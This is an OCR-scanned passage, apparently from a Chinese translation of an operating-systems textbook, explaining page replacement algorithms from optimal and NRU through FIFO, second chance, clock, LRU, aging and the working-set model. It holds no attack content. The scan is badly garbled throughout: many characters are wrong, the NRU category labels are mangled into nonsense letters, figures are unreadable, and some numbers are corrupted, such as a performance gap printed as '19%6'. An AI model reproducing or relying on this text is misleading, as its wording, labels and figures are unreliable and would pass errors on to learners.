的 Web 页 面 的 副本 总 是 最 新 的 。 而 在 虚拟 存储 系统 中 ， 内 存 中 的 页 面 既 
可 能 是 干 滔 页 面 也 可 能 是 脏 页 面 。 除 此 之 外 ， 置 换 Web 页 面 和 置换 虚拟 
内 存 中 的 页 面 需要 考虑 的 问题 是 类 似 的 。 

















在 接 下 来 讨论 的 所 有 页 面 置换 算法 中 都 存在 一 个 问题 : 当 需 要 从 内 
存 中 换 出 系 个 页 面 时 ， 它 是 否 只 能 是 缺 页 进程 本 里 的 页 面 ? 这 个 要 换 出 
的 页 面 是 人 否 可 以 属于 男 外 一 个 进程 ?在 前 一 种 情况 下 ， 可 以 有 效 地 将 每 
一 个 进程 限定 在 固定 的 页 面 数 目 内 ; 后 一 种 情况 则 不 能 。 这 两 种 情况 都 
是 可 能 的 。 在 3.5.1 市 我 们 会 继续 讨论 这 一 点 。 











3.4.1 最 优 页 面 置 换算 法 


很 容易 就 可 以 描述 出 最 好 的 页 面 置换 算法 ， 虽 然 此 算法 不 可 能 实 
现 。 该 算法 是 这 样 工作 的 : 在 缺 页 中 断 发 生 时 ， 有 些 页 面 在 内 存 中 ， 其 
中 有 一 个 页 面 〈 包 含 紧 接着 的 下 一 条 指令 的 那个 页 面 ) 将 很 快 被 访问 ， 
其 他 页 面 则 可 能 要 到 10、100 或 1000 条 指令 后 才 会 被 访问 ， 每 个 页 面 都 
可 以 用 在 该 页 面 首次 被 访问 前 所 要 执行 的 指令 数 作 为 标记 。 














最 优 页 面 置换 算法 规定 应 该 置换 标记 最 大 的 页 面 。 如 果 一 个 页 面 在 
800 万 条 指令 内 不 会 被 使 用 ， 为 外 一 个 页 面 在 600 万 条 指令 内 不 会 被 使 
用 ， 则 置换 前 一 个 页 面 ， 从 而 把 因 需 要 调 入 这 个 页 面 而 发 生 的 缺 页 中 断 
推迟 到 将 来 ， 越 入 越 好 。 计 算 机 也 像 人 一 样 ， 和 希望 把 不 愉快 的 事情 尽 可 
能 地 往 后 拖延 。 





这 个 算法 惟一 的 问题 就 是 它 是 无 法 实现 的 。 当 缺 页 中 断 发 生 时 ， 操 
作 系 统 无 法 知道 各 个 页 面 下 一 次 将 在 什么 时 候补 访问 。《 在 最 短 作 业 优 
先 调 度 算法 中 ， 我 们 曾 遇 到 同样 的 情况 ， 即 系统 如 何 知道 哪个 作业 第 最 
短 的 呢 ? ) 当然 ， 通 过 首先 在 仿真 程序 上 运行 程序 ， 跟 踩 所 有 页 面 的 访 
问 情况 ， 在 第 二 次 运行 时 利用 第 一 次 运行 时 收集 的 信息 是 可 以 实现 最 优 
页 面 置换 算法 的 。 














用 这 种 方式 ， 我 们 可 以 通过 最 优 页 面 置换 算法 对 其 他 可 实现 算法 的 
性 能 进行 比较 。 如 宋 操 作 系统 达到 的 页 面 置换 性 能 只 比 最 优 算法 差 
19%6， 那 么 即使 花费 大 量 的 精力 来 寻找 更 好 的 算法 最 多 也 只 能 换 来 1% 的 


性 能 提高 。 








为 了 避免 混 消 ， 读 者 必须 清楚 以 上 页 面 访 问 情况 的 记录 只 针对 刚刚 
被 测试 过 的 程序 和 它 的 一 个 特定 的 输入 ， 因 此 从 中 导出 的 性 能 最 好 的 页 
面 置换 算法 也 只 是 针对 这 个 特定 的 程序 和 输入 数据 的 。 虽 然 这 个 方法 对 
评价 页 面 置换 算法 很 有 用 ， 但 它 在 实际 系统 中 却 不 能 使 用 。 下 面 我 们 将 
研究 可 以 在 实际 系统 中 使 用 的 算法 。 


3.4.2 ”最 近 未 使 用 页 面 置换 算法 


为 使 操作 系统 能 够 收集 有 用 的 统计 信息 ， 在 大 部 分 具有 虚拟 内 存 的 
计算 机 中 ， 系 统 为 每 一 页 面 设置 了 两 个 状态 位 。 当 页 面 被 访问 《〈 读 或 
写 ) 时 设置 R 位 ; 当 页 面 《 即 修改 页 面 ) 被 写 入 时 设置 M 位 。 这 些 位 包 
售 在 页 表 项 中 ， 如 图 3-11 所 示 。 每 次 访问 内 存 时 更 新 这 些 位 ， 因 此 由 硬 
件 来 设置 它们 是 必要 的 。 一 旦 设置 条 位 为 1， 它 束 一 直 保 持 1 直到 操作 系 


统 将 它 复 位 。 


如 果 硬 件 没 有 这 些 位 ， 则 可 以 进行 以 下 的 软件 模拟 ， 当 启动 一 个 进 
程 时 ， 将 其 所 有 的 页 面 都 标记 为 不 在 内 存 ; 一 旦 访问 任何 一 个 页 面 就 会 
引发 一 次 缺 页 中 断 ， 此 时 操作 系统 就 可 以 设置 R 位 《在 它 的 内 部 表格 
中 ) ， 修 改 页 表 项 使 其 指向 正确 的 页 面 ， 并 设 为 READ ONLY 模 式 ， 然 
后 重新 启动 引起 缺 页 中 断 的 指令 ， 如 果 随 后 对 该 页 面 的 修改 又 引发 一 次 
缺 页 中 断 ， 则 操作 系统 设置 这 个 页 面 的 M 位 并 将 其 改 为 READ/WRITE 模 











可 以 用 R 位 和 M 位 来 构造 一 个 简单 的 页 面 置换 算法 : 当局 动 一 个 进 
程 时 ， 它 的 所 有 页 面 的 两 个 位 都 由 操作 系统 设置 成 0，R 位 被 定期 地 ( 比 
如 在 每 次 时 钟 中 断 时 ) 清 零 ， 以 区 别 最 近 没 有 被 访问 的 页 面 和 被 访问 的 
页 面 。 





当 发 生 缺 页 中 断 时 ， 操 作 系 统 检查 所 有 的 页 面 并 根据 它们 当前 的 R 
位 和 M 位 的 值 ， 把 它们 分 为 4 类 : 





HOR: 没有 被 访问 ， 没 有 被 修改 。 


FIR: 没有 被 访问 ， 已 被 修改 。 


第 2 类 : BVH, ARZA. 


第 3 类 : 已 被 访问 ， 已 被 修改 。 





尽管 第 1 类 初 看 起 来 似乎 是 不 可 能 的 ， 但 是 一 个 第 3 类 的 页 面 在 它 的 
R 位 被 时 钟 中 断 清 零 后 就 成 了 第 1 类 。 时 钟 中 断 不 清除 M 位 是 因为 在 决定 


一 个 页 面 是 否 需 要 写 回 磁盘 时 将 用 到 这 个 信息 。 清 除 R 位 而 不 清除 M 位 








NRU (Not Recently Used， 最 近 未 使 用 ) 算法 随机 地 从 类 编号 最 小 
的 非 空 类 中 挑选 一 个 页 面 淘汰 之 。 这 个 算法 隐 含 的 意思 是 ， 在 最 近 一 个 
时 钟 滴 答 中 (典型 的 时 间 是 大 约 20ms) 淘汰 一 个 没有 被 访问 的 已 修改 页 
面 要 比 淘汰 一 个 被 频繁 使 用 的 “干净 ?页 面 好 。NRU 主 要 优点 是 易于 理解 
和 能 够 有 效 地 被 实现 ， 虽 然 它 的 性 能 不 是 最 好 的 ， 但 是 已 经 够 用 了 。 











3.4.3 ”先进 先 出 页 面 置 换算 法 


另 一 种 开销 较 小 的 页 面 置换 算法 是 FIFO (First-In First-Out， 先 进 先 
出 ) 算法 。 为 了 解释 它 是 怎样 工作 的 ， 我 们 设想 有 一 个 超级 市 场 ， 它 有 
足够 的 货架 能 展示 k 种 不 同 的 商品 。 有 一 天 ， 某 家 公司 介绍 了 一 种 新 的 
方便 食品 一 一 即食 的 、 冷 冻 干 燥 的 、 可 以 用 微波 炉 加 热 的 酸 乳 栈 ， 这 个 
产品 非常 成 功 ， 所 以 容量 有 限 的 超市 必须 撤 掉 一 种 旧 的 商品 以 便 能 够 展 


示 该 新 产品 。 














一 种 可 能 的 解决 方法 就 是 找到 该 超级 市 场 中 库存 时 间 最 长 的 商品 并 
将 其 蔡 换 挥 〈 比 如 条 种 120 年 以 前 就 开始 买 的 商品 )， 理 由 是 现在 已 经 
没有 人 喜欢 它 了 。 这 实际 上 相当 于 超级 市 场 有 一 个 按照 引进 时 间 排 列 的 
所 有 商品 的 链表 。 新 的 商品 被 加 到 链表 的 尾部 ， 链 表 头 上 的 商品 则 被 撤 
fio 


同样 的 思想 也 可 以 应 用 在 页 面 置换 算法 中 。 由 操作 系统 维护 一 个 所 
有 当前 在 内 存 中 的 页 面 的 链表 ， 最 新 进入 的 页 面 放 在 表 尾 ， 节 入 进入 的 
页 面 放 在 表 头 。 当 发 生 缺 页 中 断 时 ， 淘 汰 表 头 的 页 面 并 把 新 调 入 的 页 面 
加 到 表 尾 。 当 FIFO 用 在 超级 市 场 时 ， 可 能 会 淘汰 闲 须 襄 ， 但 也 可 能 淘汰 
面粉 、 盐 或 黄油 这 一 类 常用 商品 。 因 此 ， 当 它 应 用 在 计算 机 上 时 也 会 引 
起 同样 的 问题 ， 由 于 这 一 原因 ， 很 少 使 用 纯粹 的 FIFO 算 法 。 





3.4.4 ”第 二 次 机 会 页 面 置换 算 读 


FIFO 算 法 可 能 会 把 经 常 使 用 的 页 面 置换 出 去 ， 为 了 避免 这 一 问题 ， 
对 该 算法 做 一 个 简单 的 修改 : 检查 最 老 页 面 的 R 位 。 如 果 R 位 是 0， 那 么 
这 个 页 面 既 老 又 没有 被 使 用 ， 可 以 立刻 置换 掉 ， 如 果 是 1， 就 将 R 位 清 
0， 并 把 该 页 面 放 到 链表 的 尾 端 ， 修 改 它 的 装 入 时 间 使 它 就 像 刚 装 入 的 
一 样 ， 然 后 继续 搜索 。 


一 算法 称 为 第 二 次 机 会 (second chance) 算法 ， 如 图 3-15 所 示 。 
在 图 3-15a 中 我 们 看 到 页 面 A 到 页 面 H 按 照 进 入 内 存 的 时 间 顺 序 保存 在 链 
RKP. 











先 被 装 入 
! 的 页 面 a ae 
ye 3 8 2 4 16 18 peal 
FHH H- HEHH HY | 
a) 
A 被 看 作 ， 
3 7 8 12 1 E 418 是 最 新 装 ; 
pa Hg 入 的 页 面 
b) 


图 3-15 第 二 次 机 会 算法 的 操作 (页 面 上 面 的 数字 是 装 入 时 间 ) : a) 


按 先进 先 出 的 方法 排列 的 页 面 ; b) 在 时 间 20 发 生 缺 页 中 断 并 且 A 的 R 位 已 
经 设置 时 的 页 面 链表 





假设 在 时 间 20 有 发 生 了 一 次 缺 页 中 断 ， 这 时 最 老 的 页 面 是 A， 它 是 在 
时 刻 0 到 达 的 。 如 果 A 的 R 位 是 0， 则 将 它 淘 汰 出 内 存 ， 或 者 把 它 写 回 磁 
fe CUR COBB) ， 或 者 只 是 简单 地 放弃 〈 如 果 它 是 “ 干 
GPW) ; 另 一 方面 ， 如 果 其 R 位 已 经 设置 了 ， 则 将 A 放 到 链表 的 尾部 并 
且 重 新 设置 < 装 入 时 间 ? 为 当前 时 刻 〈20) ， 然 后 清除 R 位 。 然 后 从 B 页 
面 开 始 继续 搜索 合适 的 页 面 。 








第 二 次 机 会 算法 就 是 寻找 一 个 最 近 的 时 钟 间 隅 以 来 没有 被 访问 过 的 
页 面 。 如 果 所 有 的 页 面 都 被 访 问 过 了 ， 该 算法 就 简化 为 纯粹 的 FIFO 算 
法 。 特 别 地 ， 想 象 一 下 ， 假 设 图 3-15a 中 所 有 的 页 面 的 R 位 都 被 设置 了 ， 
操作 系统 将 会 一 个 接 一 个 地 把 每 个 页 面 都 移动 到 链表 的 尾部 并 清除 被 移 
动 的 页 面 的 R 位 。 最 后 算法 又 将 回 到 页 面 A， 此 时 它 的 R 位 已 经 被 清除 
了 ， 因 此 A 页 面 将 被 淘汰 ， 所 以 这 个 算法 总 是 可 以 结束 的 。 











3.45 时钟 页 面 置换 算法 





尽管 第 二 次 机 会 算法 是 一 个 比较 合理 的 算法 ， 但 它 经 常 要 在 链表 中 
移动 页 面 ， 既 降低 了 效率 又 不 是 很 有 必要 。 一 个 更 好 的 办 法 是 把 所 有 的 
页 面 都 保存 在 一 个 类 似 钟 面 的 环形 链表 中 ， 一 个 表 针 指 加 最 老 的 页 面 ， 
如 图 3-16 所 示 。 





当 发 生 缺 页 中 断 时 ， 检 


得 表 针 指 四 的 页 面 。 根 


R=0: 淘汰 页 面 
[| |E] R=1: 清除 R 位 并 向 前 ， 
移动 表 针 


图 3-16 时钟 页 面 置 换算 法 








当 发 生 缺 页 中 断 时 ， 算 法 首先 检查 表 针 指向 的 页 面 ， 如 果 它 的 R 位 
古 0 就 淘汰 该 页 面 ， 并 把 新 的 页 面 插入 这 个 位 置 ， 然 后 把 表 针 前 移 一 个 








位 置 ;， 如 果 R 位 是 1 就 清除 R 位 并 把 表 针 前 移 一 个 位 置 ， 重 复 这 个 过 程 直 
到 找到 了 一 个 R 位 为 0 的 页 面 为 目 。 了 解 了 这 个 算法 的 工作 方式 ， 就 明白 
为 什么 它 被 称 为 时 钟 (dock) 算法 了 。 





3.4.6 ”最 近 最 少 使 用 页 面 置换 算法 


对 最 优 算法 的 一 个 很 好 的 近似 是 基于 这 样 的 观察 : 在 前 面 几 条 指令 
中 频 楷 使 用 的 页 面 很 可 能 在 后 面 的 几 条 指令 中 被 使 用 。 反 过 来 说 ， 已 经 
很 久 没有 使 用 的 页 面 很 有 可 能 在 未 来 较 长 的 一 段 时 间 内 仍然 不 会 被 使 
用 。 这 个 思想 提示 了 一 个 可 实现 的 算法 : 在 缺 页 中 断 发 生 时 ， 置 换 未 使 
用 时 间 最 长 的 页 面 。 这 个 策略 称 为 LRU (Least Recently Used， 最 近 最 
少 使 用 ) 页 面 置换 算法 。 











虽然 LTRU 在 理论 上 是 可 以 实现 的 ， 但 代价 很 高 。 为 了 完全 实现 
LRU， 需 要 在 内 存 中 维护 一 个 所 有 页 面 的 链表 ， 最 近 最 多 使 用 的 页 面 在 
表 头 ， 最 近 最 少 使 用 的 页 面 在 表 尾 。 困 难 的 是 在 每 次 访问 内 存 时 都 必须 
要 更 新 整个 链表 。 在 链表 中 找到 一 个 页 面 ， 删 除 它 ， 然 后 把 它 移 动 到 表 
头 是 一 个 非常 费时 的 操作 ， 即 使 使 用 硬件 实现 也 一 样 费 时 《假设 有 这 样 
的 硬件 ) 。 








然而 ， 还 是 有 一 些 使 用 特殊 硬件 实现 LRU 的 方法 。 我 们 先 考 虑 一 个 
最 简单 的 方法 。 这 个 方法 要 求 硬件 有 一 个 64 位 计数 器 C， 它 在 每 条 指令 
执行 完 后 自动 加 1， 每 个 页 表 项 必须 有 一 个 足够 容纳 这 个 计数 器 值 的 
域 。 在 每 次 访问 内 存 后 ， 将 当前 的 C 值 保存 到 被 访问 页 面 的 页 表 项 中 。 
一 旦 发 生 缺 页 中 断 ， 操 作 系统 就 检查 所 有 页 表 项 中 计数 器 的 值 ， 找 到 值 











最 小 的 一 个 页 面 ， 这 个 页 面 就 是 最 近 最 少 使 用 的 页 面 。 


现在 让 我 们 看 一 看 第 二 个 人 硬件 实现 的 LRU 算 法 。 在 一 个 有 n 个 页 框 
的 机 器 中 ，LRU 硬 件 可 以 维持 一 个 初 值 为 0 的 nxn 位 的 矩阵 。 当 访问 到 页 
框 kK 时 ， 人 硬件 首先 把 k 行 的 位 都 设置 成 1， 再 把 k 列 的 位 都 设置 成 0。 在 任 
何 时 刻 ， 二 进 制 数值 最 小 的 行 束 是 最 近 最 少 使 用 的 ， 第 二 小 的 行 是 下 一 
个 最 近 最 少 使 用 的 ， 以 此 类 推 。 这 个 算法 的 工作 过 程 可 以 用 图 3-17 所 示 
的 实例 说 明 ， 该 实例 中 有 4 个 页 框 ， 页 面 访问 次 序 为 : 








0123210323 


访问 页 面 0 后 的 状态 如 图 3-17a 所 示 ， 访 问 页 1 后 的 状态 如 图 3-17b 所 
示 ， 以 此 类 推 。 


页 面 页 面 页 面 页 面 页 面 





图 3-17 使 用 矩阵 的 LRU， 页 面 以 0、1、2、3、2、1、0、3、2、3 次 


序 访问 


3.4.7 用 软件 模拟 LRU 


前 面 两 种 LRU 算 法 虽然 在 理论 上 都 是 可 以 实现 的 ， 但 只 有 非常 少 的 
计算 机 拥有 这 种 硬件 。 因 此 ， 需 要 一 个 能 用 软件 实现 的 解决 方案 。 一 种 
可 能 的 方案 称 为 NFU (Not Frequently Used， 最 不 常用 ) 算法 。 该 算法 
将 每 个 页 面 与 一 个 软件 计数 器 相关 联 ， 计 数 器 的 初 值 为 0。 每 次 时 钟 中 
叶 时 ， 由 操作 系统 扫描 内 存 中 所 有 的 页 面 ， 将 每 个 页 面 的 R 位 〈 它 的 值 
是 0 或 1) 加 到 它 的 计数 器 上 。 这 个 计数 器 大 体 上 跟 踊 了 各 个 页 面 被 访问 
的 频繁 程度 。 发 生 缺 页 中 断 时 ， 则 置换 计数 器 值 最 小 的 页 面 。 








NFU 的 主要 问题 是 它 从 来 不 忘记 任何 事情 。 比 如 ， 在 一 个 多 次 〈 扫 
HO 编译 器 中 ， 在 第 一 次 扫描 中 被 频繁 使 用 的 页 面 在 程序 进入 第 二 次 扫 
描 时 ， 其 计数 器 的 值 可 能 仍然 很 高 。 实 际 上 ， 如 果 第 一 次 扫描 的 执行 时 
间 恰 好 是 各 次 扫描 中 最 长 的 ， 含 有 以 后 各 次 扫描 代码 的 页 面 的 计数 器 可 

征 比 含有 第 一 次 扫描 代码 的 页 面 小 ， 结 采 是 操作 系统 将 置换 有 用 的 
页 面 而 不 是 不 再 使 用 的 页 面 。 


OE p 
能 总 





圣 运 的 是 只 需 对 NEFU 做 一 个 小 小 的 修改 就 能 使 它 很 好 地 模拟 LRU。 
其 修改 分 为 两 部 分 : 首先 ， 在 R 位 被 加 进 之 前 先 将 计数 器 右 移 一 位 ; 其 
次 ， 将 R 位 加 到 计数 器 最 左 端的 位 而 不 是 最 右 端的 位 。 


修改 以 后 的 算法 称 为 老化 〈aging) 算法 ， 图 3-18 解 释 了 它 是 如 何 工 





作 的。 假设 在 第 一 个 时 钟 滴答 后 ， 页 面 0 到 页 面 5 的 R 位 值 分 别 是 1、0、 
1、0、1、1 《页面 0 为 1， 页 面 1 为 0%， 页 面 2 为 1， 以 此 类 推 ) 。 换 句 话 
说 ， 在 时 钟 涌 管 0 到 时 钟 滴 答 1 期 间 ， 访 问 了 页 0、2、4、5， 它 们 的 R 位 
设置 为 1， 而 其 他 页 面 的 R 位 仍然 是 0。 对 应 的 6 个 计数 器 在 经 过 移 位 并 把 
R 位 插入 其 左 端 后 的 值 如 图 3-18a 所 示 。 图 中 后 面 的 4 列 是 在 下 4 个 时 钟 泣 
答 后 的 6 个 计数 器 的 值 。 
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图 318 用 软件 模拟 LRU 的 老化 算法 。 图 中 所 示 是 6 个 页 面 在 5 个 时 钟 
滴答 的 情况 ，5 个 时 钟 滴答 分 别 由 a~e 表 示 


发 生 缺 页 中 断 时 ， 将 置换 计数 器 值 最 小 的 页 面 。 如 果 一 个 页 面 在 前 
面 4 个 时 钟 滴答 中 都 没有 访问 过 ， 那 么 它 的 计数 需 最 前 面 应 该 有 4 个 连 


的 0， 因 此 它 的 值 肯定 要 比 在 前 面 三 个 时 钟 滴答 中 都 没有 被 访问 过 的 


= 





Non 


= 


N 


面 的 计数 器 值 小 。 





该 算法 与 LRU 有 两 个 区 别 。 如 图 3-18e 中 的 页 面 3 和 页 面 5， 它 们 都 
连续 两 个 时 钟 滴答 没有 被 访问 过 了 ， 而 在 两 个 时 钟 滴答 之 前 的 时 钟 滴答 
中 它们 都 被 访问 过 。 根 据 LRU， 如 果 必 须 置换 一 个 页 面 ， 则 应 该 在 这 两 
个 页 面 中 选择 一 个 。 然 而 现在 的 问题 是 ， 我 们 不 知道 在 时 钟 滴答 1 到 时 
钟 滴答 2 期 间 它 们 中 的 哪 一 个 页 面 是 后 被 访问 到 的 。 因 为 在 每 个 时 钟 滴 
答 中 只 记录 了 一 位 ， 所 以 无 法 区 分 在 一 个 时 钟 滴答 中 哪个 页 面 在 较 早 的 
时 间 被 访问 以 及 哪个 页 面 在 较 晚 的 时 间 被 访问 ， 因 此 ， 我 们 所 能 做 的 就 
是 置换 页 面 3， 原 因 是 页 面 5 在 更 往 前 的 两 个 时 钟 滴答 中 也 被 访问 过 而 页 
面 3 没有 。 








LRU 和 老化 算法 的 第 二 个 区 别 是 老化 算法 的 计数 器 只 有 有 限 位 数 
《本 例 中 是 8 位 ) ， 这 就 限制 了 其 对 以 往 页 面 的 记录 。 如 果 两 个 页 面 的 
计数 器 都 是 9， 我 们 只 能 在 两 个 页 面 中 随机 选 一 个 进行 置换 。 实 际 上 ， 
有 可 能 其 中 一 个 页 面 上 次 被 访问 是 在 9 个 时 钟 滴答 以 前 ， 另 一 个 页 面 是 
在 1000 个 时 钟 滴答 以 前 ， 而 我 们 却 无 法 看 到 这 些 。 在 实践 中 ， 如 果 时 钟 
滴答 是 20ms，8 位 一 般 是 够 用 的 。 假 如 一 个 页 面 已 经 有 160ms 没 有 被 访 
问 过 ， 那 么 它 很 可 能 并 不 重要 。 





3.4.8 工作 集 页 面 置换 算法 


在 单纯 的 分 页 系统 里 ， 刚 局 动 进程 时 ， 在 内 存 中 并 没有 页 面 。 在 
CPU 试图 取 第 一 条 指令 时 就 会 产生 一 次 缺 页 中 断 ， 使 操作 系统 闭 入 含有 
第 一 条 指令 的 页 面 。 其 他 由 访问 全 局 数据 和 堆栈 引起 的 缺 页 中 断 通 常会 
紧 接着 发 生 。 一 段 时 间 以 后 ， 进 程 需 要 的 大 部 分 页 面 都 已 经 在 内 存 了 ， 
进程 开始 在 较 少 缺 页 中 断 的 情况 下 运行 。 这 个 策略 称 为 请 求 调 页 
(demand paging) ， 因 为 页 面 是 在 需要 时 被 调 入 的 ， 而 不 是 预先 装 入 。 





编写 一 个 测试 程序 很 容易 ， 在 一 个 大 的 地 址 空间 中 系统 地 读 所 有 的 
页 面 ， 将 出 现 大 量 的 缺 页 中 断 ， 因 此 会 导致 没有 足够 的 内 存 来 容纳 这 些 
页 面 。 不 过 幸运 的 是 ， 大 部 分 进程 不 是 这 样 工 作 的 ， 它 们 都 表现 出 了 一 
种 局 部 性 访问 行为 ， 即 在 进程 运行 的 任何 阶段 ， 它 都 只 访问 较 少 的 一 部 
分 页 面 。 例 如 ， 在 一 个 多 次 扫描 编译 器 中 ， 各 次 扫描 时 只 访问 所 有 页 面 
中 的 一 小 部 分 ， 并 且 是 不 同 的 部 分 。 





一 个 进程 当前 正在 使 用 的 页 面 的 集合 称 为 它 的 工作 集 Cworking 
set) (Denning, 1968a; Denning, 1980) 。 如 果 整 个 工作 集 都 被 装 入 
到 了 内 存 中 ， 那 么 进程 在 运行 到 下 一 运行 阶段 〈 例 如 ， 编 译 器 的 下 一 遍 
扫描 ) 之前， 不 会 产生 很 多 缺 页 中 断 。 若 内 存 太 小 而 无 法 容纳 下 整个 工 
作 集 ， 那 么 进程 的 运行 过 程 中 会 产生 大 量 的 缺 页 中 断 ， 导 致 运行 速度 也 














Hp 


变 得 很 缓慢 ， 因 为 通常 只 需要 几 个 纳 秒 就 能 执行 完 一 条 指令 ， 而 通常 
需要 十 坚 秒 才能 从 磁盘 上 读 入 一 个 页 面 。 如 果 一 个 程序 每 10ms 只 能 执行 
一 到 两 条 指令 ， 那 么 它 将 会 需要 很 长 时 间 才 能 运行 完 。 知 每 执行 几 条 指 
令 程 友 束 发 生 一 次 缺 页 中 断 ， 那 么 就 称 这 个 程序 发 生 了 匡 钱 
(thrashing) (Denning, 1968b) 。 








在 多 道 程序 设计 系统 中 ， 经 常会 把 进程 转移 到 磁盘 上 〈 即 从 内 存 中 
移 走 所 有 的 页 面 ) ， 这 样 可 以 让 其 他 的 进程 有 机 会 占有 CPU。 有 一 个 问 
题 是 ， 当 该 进程 再 次 调 回来 以 后 应 该 怎样 办 ? 从 技术 的 角度 上 讲 ， 并 不 
需要 做 什么 。 该 进程 会 一 直 产 生 缺 页 中 断 直 到 它 的 工作 集 全 部 被 装 入 内 
存 。 然 而 ， 每 次 装 入 一 个 进程 时 都 要 产生 20、100 甚 至 1000 次 缺 页 中 
断 ， 速 度 显 然 太 慢 了 ， 并 且 由 于 CPU 需 要 几 毫 秒 时 间 处 理 一 个 缺 页 中 
断 ， 因 此 有 相当 多 的 CPU 时 间 也 被 浪费 了 。 








所 以 不 少 分 页 系统 都 会 设法 跟踪 进程 的 工作 集 ， 以 确保 在 让 进程 运 
行 以 前 ， 它 的 工作 集 就 已 在 内 存 中 了 。 该 方法 称 为 工作 集 模型 
(working set model) (Denning, 1970) ， 其 目的 在 于 大 大 减少 缺 页 中 
断 率 。 在 让 进程 运行 前 预先 装 入 其 工作 集 页 面 也 称 为 预先 调 页 

请 注意 工作 集 是 随 着 时 间 变 化 的 。 





(prepaging) 。 





人 们 很 早 就 发 现 大 多 数 程序 都 不 是 均匀 地 访问 它们 的 地 址 空间 的 ， 
而 访问 往往 是 集中 于 一 小 部 分 页 面 。 一 次 内 存 访问 可 能 会 取出 一 条 指 
令 ， 也 可 能 会 取 数 据 ， 或 者 是 存储 数据 。 在 任 一 时 刻 t， 都 存在 一 个 集 





合 ， 筷 包 舍 所 有 最 近 k 次 内 存 访问 所 访问 过 的 页 面 。 这 个 集合 w(ob 台 是 
工作 集 。 因 为 最 近 k=1 次 访问 肯定 会 访问 最 近 k>1 次 访问 所 访问 过 的 页 
面 ， 所 以 wdob 是 k 的 单调 非 递减 函数 。 随 独 k 的 变 大 ，w(kb 是 不 会 无 限 
变 大 的 ， 因 为 程序 不 可 能 访问 比 它 的 地 址 空间 所 能 容纳 的 页 面 数目 上 限 
还 多 的 页 面 ， 并 且 几 乎 没有 程序 会 使 用 每 个 页 面 。 图 3-19 描 述 了 作为 k 


的 函数 的 工作 集 的 大 小 。 











w(k, t) 


k 
图 3-19 工作 集 是 最 近 k 次 内 存 访问 所 访问 过 的 页 面 的 集合 ， 函 数 


wk 是 在 时 刻 t 时 工作 集 的 大 小 


事实 上 大 多 数 程 序 会 任意 访问 一 小 部 分 页 面 ， 但 是 这 个 集合 会 随 着 
时 间 而 缓慢 变化 ， 这 个 事实 也 解释 了 为 什么 一 开始 曲线 快速 地 上 升 而 k 
较 大 时 上 升 会 变 慢 。 举 例 来 次 ， 茶 个 程序 执行 占用 了 两 个 页 面 的 循环 ， 
并 使 用 四 个 页 面 上 的 数据 ， 那 么 可 能 每 执行 1000 条 指令 ， 它 就 会 访问 这 
六 个 页 面 一 次 ， 但 是 最 近 的 对 其 他 页 面 的 访问 可 能 是 在 100 万 条 指令 以 
前 的 初始 化 阶段 。 因 为 这 是 个 渐进 的 过 程 ，k 值 的 选择 对 工作 集 的 内 容 





影响 不 大 。 换 句 话 说 ，k 的 值 有 一 个 很 大 的 范围 ， 它 处 在 这 个 范围 中 时 
工作 集 不 会 变 。 因 为 工作 集 随 时 间 变 化 很 慢 ， 那 么 当 程 序 重新 开始 时 ， 
就 有 可 能 根据 它 上 次 结束 时 的 工作 集 对 要 用 到 的 页 面 做 一 个 合理 的 推 
测 ， 预 先 调 页 就 是 在 程序 继续 运行 之 前 预先 闭 入 推测 出 的 工作 集 的 页 
面 。 





为 了 实现 工作 集 模型 ， 操 作 系 统 必须 跟踪 哪些 页 面 在 工作 集中 。 通 
过 这 些 信息 可 以 直接 推导 出 一 个 合理 的 页 面 置换 算法 当 发 生 缺 页 中 断 
时 ， 淘 汰 一 个 不 在 工作 集中 的 页 面 。 为 了 实现 该 算法 ， 就 需要 一 种 精确 
的 方法 来 确定 哪些 页 面 在 工作 集中 。 根 据 定 义 ， 工 作 集 就 是 最 近 k 次 内 
存 访 问 所 使 用 过 的 页 面 的 集合 《有 些 设 计 者 使 用 最 近 k 次 页 面 访问 ， 但 
是 选择 是 任意 的 ) 。 为 了 实现 工作 集 算 法 ， 必 须 预先 选 定 k 的 值 。 一 
选 定 某 个 值 ， 每 次 内 存 访问 之 后 ， 最 近 k 次 内 存 访问 所 使 用 过 的 页 面 的 

合 就 是 惟一 确定 的 了 。 














当然 ， 有 了 工作 集 的 定义 并 不 意味 着 存在 一 种 有 效 的 方法 能 够 在 程 
序 运行 期 间 及 时 地 计算 出 工作 集 。 设 想 有 一 个 长 度 为 k 的 移 位 寄存 器 
每 进行 一 次 内 存 访问 就 把 寄存 器 左 移 一 位 ， 然 后 在 最 右 端 插入 刚才 所 访 
问 过 的 页 面 写 。 移 位 寄存 器 中 的 k 个 页 面 号 的 集合 就 是 工作 集 。 理 论 
上 ， 当 缺 页 中 断 发 生 时 ， 只 要 读 出 移 位 寄存 器 中 的 内 容 并 排序 ， 然 后 删 
除 重 复 的 页 面 。 结 果 就 是 工作 集 。 然 而 ， 维 护 移 位 寄存 器 并 在 缺 页 中 类 
时 处 理 它 所 需 的 开销 很 大 ， 因 此 该 扩 术 从 来 没有 被 使 用 过 














作为 蔡 代 ， 可 以 使 用 几 种 近似 的 方法 。 一 种 常见 的 近似 方法 就 是 ， 
不 是 向 后 找 最 近 k 次 的 内 存 访 问 ， 而 是 考虑 其 执行 时 间 。 例 如 ， 按 照 以 
前 的 方法 ， 我 们 定义 工作 集 为 前 1000 万 次 内 存 访 问 所 使 用 过 的 页 面 的 集 

那么 现在 就 可 以 这 样 定 义 : 工作 集 即 是 过 去 10ms 中 的 内 存 访问 所 用 
到 的 页 面 的 集合 。 实 际 上 ， 这 样 的 模型 很 合适 且 更 容易 实现 。 要 注意 
到 ， 每 个 进程 只 计算 它 自 己 的 执行 时 间 。 因 此 ， 如 果 一 个 进程 在 T 时 刻 
开始 ， 在 《〈T+100) ms 的 时 刻 使 用 了 40ms CPU 时 间 ， 对 工作 集 而 言 ， 它 
的 时 间 就 是 40ms。 一 个 进程 从 它 开 始 执行 到 当前 所 实际 使 用 的 CPU 时 间 
总 数 通 常 称 作 当前 实际 运行 时 间 。 通 过 这 个 近似 的 方法 ， 进 程 的 工作 集 
可 以 被 称 为 在 过 去 的 t 秒 实际 运行 时 间 中 它 所 访问 过 的 页 面 的 集合 。 




















现在 让 我 们 来 看 一 下 基于 工作 集 的 页 面 置换 算法 。 基 本 思路 就 是 找 
出 一 个 不 在 工作 集中 的 页 面 并 淘汰 它 。 在 图 3-20 中 读者 可 以 看 到 茶 台 机 
器 的 部 分 页 表 。 因 为 只 有 那些 在 内 存 中 的 页 面 才 可 以 作为 候选 者 被 淘 
